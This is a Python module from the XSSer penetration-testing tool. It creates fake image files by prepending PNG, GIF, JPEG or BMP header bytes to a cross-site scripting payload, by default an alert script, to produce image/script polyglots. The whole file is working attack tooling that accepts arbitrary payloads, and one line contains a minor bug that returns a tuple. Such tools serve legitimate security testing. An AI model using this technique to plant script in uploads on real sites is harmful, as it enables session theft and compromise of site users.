imagexss.py 2.3 KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-"
  3. # vim: set expandtab tabstop=4 shiftwidth=4:
  4. """
  5. This file is part of the XSSer project, https://xsser.03c8.net
  6. Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
  7. xsser is free software; you can redistribute it and/or modify it under
  8. the terms of the GNU General Public License as published by the Free
  9. Software Foundation version 3 of the License.
  10. xsser is distributed in the hope that it will be useful, but WITHOUT ANY
  11. WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  12. FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
  13. details.
  14. You should have received a copy of the GNU General Public License along
  15. with xsser; if not, write to the Free Software Foundation, Inc., 51
  16. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  17. """
  18. import os
  19. class ImageInjections(object):
  20. def __init__(self, payload =''):
  21. self._payload = payload
  22. def image_xss(self, filename, payload):
  23. """
  24. Create -fake- image with code XSS injected.
  25. """
  26. # check user image name input valid extensions
  27. root, ext = os.path.splitext(filename)
  28. # create file and inject code
  29. if ext.lower() in [".png", ".jpg", ".gif", ".bmp"]:
  30. f = open(filename, 'wb')
  31. # check user payload input
  32. user_payload = payload
  33. if not user_payload:
  34. user_payload = "<script>alert('XSS')</script>"
  35. # inject each XSS specific code
  36. if ext.lower() == ".png":
  37. content = '‰PNG' + user_payload
  38. elif ext.lower() == ".gif":
  39. content = 'GIF89a' + user_payload
  40. elif ext.lower() == ".jpg":
  41. content = 'ÿØÿà JFIF' + user_payload
  42. elif ext.lower() == ".bmp":
  43. content = 'BMFÖ' + user_payload
  44. # write and close
  45. f.write(content)
  46. f.close()
  47. image_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n ", root + ext + "\n"
  48. else:
  49. image_results = "\n[Error] Supported extensions = .PNG, .GIF, .JPG or .BMP\n"
  50. return image_results
  51. if __name__ == '__main__':
  52. image_xss_injection = ImageInjections('')
  53. print image_xss_injection.image_xss('ImageXSSpoison.png' , "<script>alert('XSS')</script>")